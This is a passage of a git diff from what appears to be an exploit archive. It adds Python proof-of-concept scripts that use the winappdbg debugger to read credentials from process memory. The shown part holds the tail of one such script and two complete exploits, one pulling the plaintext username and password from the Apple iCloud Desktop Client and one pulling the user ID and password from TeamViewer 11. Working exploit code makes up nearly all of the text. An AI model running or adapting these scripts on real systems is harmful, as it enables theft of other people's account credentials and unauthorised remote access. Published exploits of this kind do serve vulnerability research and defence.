memory_dump[i].split('password=')[1] + username = email_addr.split('&hiddenEmail=')[0] + password = tmp_passwd.split('&rememberMe=')[0] + if username != '' and password !='': + found = 1 + print "[+] Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % urllib.unquote_plus(username) + print "[+] Password: %s" % password + break + if found == 0: + print "[-] Credentials not found! Make sure the client is connected." + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() + + + +###################################################################### + +##### +# Apple iCloud Desktop Client v5.2.1.0 Local Credentials Disclosure After Sign Out Exploit +# Tested on Windows Windows 7 64bit, English +# Vendor Homepage @ https://www.apple.com/ +# Product Homepage @ https://support.apple.com/en-us/HT204283 +# Date 07/09/2016 +# Bug Discovery by: +# +# Yakir Wizman (https://www.linkedin.com/in/yakirwizman) +# http://www.black-rose.ml +# +# Viktor Minin (https://www.linkedin.com/in/MininViktor) +# https://1-33-7.com/ +# +# Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# http://korznikov.com/ +# +##### +# Apple iCloud Desktop Client v5.2.1.0 is vulnerable to local credentials disclosure after the user is logged out. +# It seems that iCloud does not store the supplied credentials while the user is logged in, but after sign out the supplied username and password are stored in a plaintext format in memory process. +# Funny eh?! +# A potential attacker could reveal the supplied username and password in order to gain access to iCloud account. +# +# Authors are not responsible for any misuse or demage which caused by use of this script code. +# Please use responsibly. +##### +# Proof-Of-Concept Code: + +import time +import urllib +from winappdbg import Debug, Process + +def b2h(str): + return ''.join(["%02X " % ord(x) for x in str]).strip() + +def h2b(str): + bytes = [] + str = ''.join(str.split(" ")) + for i in range(0, len(str), 2): + bytes.append(chr(int(str[i:i+2], 16))) + return ''.join(bytes) + +usr = '' +pwd = '' +found = 0 +filename = "iCloud.exe" +process_pid = 0 +memory_dump = [] + +debug = Debug() +try: + print "#########################################################################" + print "#\tApple iCloud v5.2.1.0 Local Credentials Disclosure Exploit\t#" + print "# Bug Discovery by Yakir Wizman, Victor Minin, Alexander Korznikov\t#" + print "#\t\tTested on Windows Windows 7 64bit, English\t\t#" + print "#\t\t\tPlease use responsibly.\t\t\t\t#" + print "#########################################################################\r\n" + print "[~] Searching for pid by process name '%s'.." % (filename) + time.sleep(1) + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(filename): + process_pid = process.get_pid() + if process_pid is not 0: + print "[+] Found process with pid #%d" % (process_pid) + time.sleep(1) + print "[~] Trying to read memory for pid #%d" % (process_pid) + + process = Process(process_pid) + for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'): + memory_dump.append(process.read(address,50)) + + try: + str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1] + usr = h2b(str.split(' 00')[0]) + except: + pass + + memory_dump = [] + for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'): + memory_dump.append(process.read(address,60)) + try: + str = b2h(memory_dump[0]).split('07 00 02 09')[1] + pwd = h2b(str.split(' 00')[0]) + except: + pass + + if usr != '' and pwd !='': + found = 1 + print "[+] iCloud Credentials found!\r\n----------------------------------------" + print "[+] Username: %s" % usr + print "[+] Password: %s" % pwd + if found == 0: + print "[-] Credentials not found!" + else: + print "[-] No process found with name '%s'." % (filename) + + debug.loop() +finally: + debug.stop() diff --git a/platforms/windows/local/40342.py b/platforms/windows/local/40342.py new file mode 100755 index 000000000..33bef474f --- /dev/null +++ b/platforms/windows/local/40342.py @@ -0,0 +1,74 @@ +##### +# TeamViewer 11.0.65452 (64 bit) Local Credentials Disclosure +# Tested on Windows 7 64bit, English +# Vendor Homepage @ https://www.teamviewer.com/ +# Date 07/09/2016 +# Bug Discovered by Alexander Korznikov (https://www.linkedin.com/in/nopernik) +# +# http://www.korznikov.com | @nopernik +# +# Special Thanks to: +# Viktor Minin (https://www.exploit-db.com/author/?a=8052) | (https://1-33-7.com/) +# Yakir Wizman (https://www.exploit-db.com/author/?a=1002) | (http://www.black-rose.ml) +# +##### +# TeamViewer 11.0.65452 is vulnerable to local credentials disclosure, the supplied userid and password are stored in a plaintext format in memory process. +# There is no need in privilege account access. Credentials are stored in context of regular user. +# A potential attacker could reveal the supplied username and password automaticaly and gain persistent access to host via TeamViewer services. +# +# Proof-Of-Concept Code: +##### + +from winappdbg import Debug, Process, HexDump +import sys +import re + +filename = 'TeamViewer.exe' + +def memory_search( pid ): + found = [] + # Instance a Process object. + process = Process( pid ) + # Search for the string in the process memory. + + # Looking for User ID: + userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]' + for address in process.search_regexp( userid_pattern ): + found += [address] + + print 'Possible UserIDs found:' + found = [i[-1] for i in found] + for i in set(found): + print i.replace('\x00','') + + found = [] + # Looking for Password: + pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00' + for address in process.search_regexp( pass_pattern ): + found += [process.read(address[0]-3,16)] + if found: + print '\nPassword:' + if len(found) > 1: + s = list(set([x for x in found if found.count(x) > 1])) + for i in s: + pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0] + print pwd + else: + print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0] + + return found + +debug = Debug() +try: + # Lookup the currently running processes. + debug.system.scan_processes() + # For all processes that match the requested filename... + for ( process, name ) in debug.system.find_processes_by_filename( filename ): + pid = process.get_pid() + + memory_search(pid) + +finally: + debug.stop() + +